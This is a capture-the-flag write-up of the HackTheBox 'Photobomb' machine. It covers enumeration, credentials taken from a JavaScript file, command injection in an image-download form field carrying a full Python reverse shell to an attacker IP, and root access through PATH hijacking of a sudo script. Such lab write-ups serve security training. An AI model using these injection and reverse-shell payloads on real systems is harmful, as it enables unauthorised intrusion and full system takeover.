HackTheBox Writeup: Photobomb

Enum
nmap 10.10.11.182 -sCV -A -T5

Find two open ports 22 and 80 lets check out this

Add domain photobomb.htb in /etc/hosts file

This is site running port 80

Lets check web enum with feroxbuster;

Yes we finds some directories; Check this http://photobomb.htb/printer but oops we dont have any credential for this login form :(

Browse the website and found a javascript file photobomb.js with the credential username:pH0t0 pass:b0Mb! :)

and goto this tada :)

then go to login form and fill creds and welcome photo gallery panel ;

There are some specious form with POST action to download the image.
Intercept it with BurpSuite to get the request…

We send the request, and we got the image with png extension downloaded.

Humm. As the Burp request, and at the HTML code, we know that the source image is with jpg, so i guess there is some internal process to convert the extension from jpg to png.
So we will tried to inject to the convert process.

POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=png;ping -c 20 10.10.14.42&dimensions=1000x1500

We test if there are code injection that will ping to our machine.

At our machine, open new tab and start to hear ping-pong with tcpdump

tcpdump -nni tun0

And we got the ping-pong request coming:

So we will replace the ping with our reverse shell code;

export RHOST="10.10.14.42";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'

Finally the Burp Request will like this;

POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 295
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=png;export RHOST="10.10.14.42";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'&dimensions=1000x1500

We open nc to listen at our machine:

nc -lvnp 4444

We send request at Burp. And we got shell;

Foothold

Check the id:

uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)

Check the sudo permission:

wizard@photobomb:~/photobomb$ sudo -l
sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

Take a look at cleanup.sh

cat /opt/cleanup.sh

Output:

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

Well, there a find command without absolute path.

Privilege Escalate

Here step to get root.

Move to /tmp and create find

cd /tmp
touch find
echo "/bin/bash -p" > find
chmod +x find

Run the /opt/cleanup.sh with environment set

sudo PATH=/tmp:$PATH /opt/cleanup.sh

Output:

wizard@photobomb:/tmp$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
sudo PATH=/tmp:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb#root@photobomb:/home/wizard/photobomb# id
id
uid=0(root) gid=0(root) groups=0(root)
root@photobomb:/home/wizard/photobomb#